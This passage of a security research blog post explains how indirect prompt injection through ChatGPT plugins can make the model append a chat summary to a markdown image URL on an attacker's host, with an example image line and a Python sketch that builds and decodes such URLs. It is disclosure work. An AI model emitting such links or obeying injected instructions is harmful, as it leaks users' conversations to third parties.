This post shows how a malicious website can take control of a ChatGPT chat session and exfiltrate the history of the conversation.
With plugins, data exfiltration can happen simply by sending too much data to the plugin in the first place. Users need more security controls, and more insight into what is being sent to a plugin, to stay in control.
However, this post is not about sending too much data to a plugin, but about a malicious actor who controls the data a plugin retrieves.
Untrusted Data and Markdown Injection
Whoever controls the data a plugin retrieves can exfiltrate the chat history, because ChatGPT renders markdown images.
Basically, if the LLM returns a markdown image in the form of
![data exfiltration in progress](https://attacker/q=*exfil_data*)
ChatGPT will render it automatically and retrieve the URL. During an Indirect Prompt Injection the adversary controls what the LLM does (I call it AI Injection for a reason), so it can instruct the LLM to summarize the chat history so far and append that summary to the URL, which exfiltrates the data.
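To make the mechanism concrete, here is a minimal Python sketch of how conversation data ends up inside an image URL and why merely rendering that image leaks it. It assumes a hypothetical endpoint `https://attacker.example/log` and a query parameter named `q`; the helper names are my own, and the regex is a simplification for illustration, not how ChatGPT's renderer actually parses markdown.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical endpoint for illustration only (the post's example uses https://attacker/...).
BASE_URL = "https://attacker.example/log"

# Simplified pattern for ![alt](url); captures the URL a renderer would resolve.
IMAGE_RE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")


def build_image_markdown(base_url: str, data: str) -> str:
    """Embed `data` (e.g. a chat summary) in the query string of a markdown image URL."""
    # quote() percent-encodes spaces, parentheses, '&', '=' etc., so the URL stays one token.
    return f"![data exfiltration in progress]({base_url}?q={quote(data)})"


def image_urls(markdown: str) -> list[str]:
    """Return every image URL a renderer would fetch automatically, without user interaction."""
    return IMAGE_RE.findall(markdown)


def received_data(url: str) -> str:
    """Decode the `q` parameter the way the server receiving the GET request would see it."""
    return parse_qs(urlsplit(url).query)["q"][0]


if __name__ == "__main__":
    reply = build_image_markdown(BASE_URL, "user asked about Q3 revenue")
    print(reply)
    # ![data exfiltration in progress](https://attacker.example/log?q=user%20asked%20about%20Q3%20revenue)
    for url in image_urls(reply):
        print(received_data(url))  # user asked about Q3 revenue
```

The key point the sketch illustrates is that no click is needed: as soon as the client fetches the image, whatever the injected instructions placed in the query string has left the chat session and landed in the server's request log.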
I’m not the only one to point this out: Roman Samoilenko observed and posted about this vulnerability in ChatGPT before. Roman found it on March 14th; I ran across it independently a few weeks later.
Proof of Concept Demonstration
This is possible with plugins, e.g. via the WebPilot Plugin; also check out the YouTube Transcript Plugin Injection I posted about the other day.
The LLM’s response can contain markdown (or instruct the AI to build